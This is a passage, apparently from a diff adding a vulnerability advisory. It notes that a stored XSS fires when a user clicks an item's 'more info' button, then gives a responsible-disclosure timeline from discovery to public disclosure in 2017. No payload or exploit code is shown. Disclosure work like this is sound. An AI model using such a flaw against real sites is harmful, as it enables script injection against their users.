+- Once the user click on the more info button of the item, the XSS would be executed
+
+==========================================================
+
+# Timeline
+- 06/06/2017: Vulnerability found
+- 20/06/2017: Vendor informed
+- 20/06/2017: Vendor responded and acknowledged
+- 16/07/2017: Vendor fixed the issue
+- 12/08/2017: Vendor agreed on public disclosure
+- 14/08/2017: Public disclosure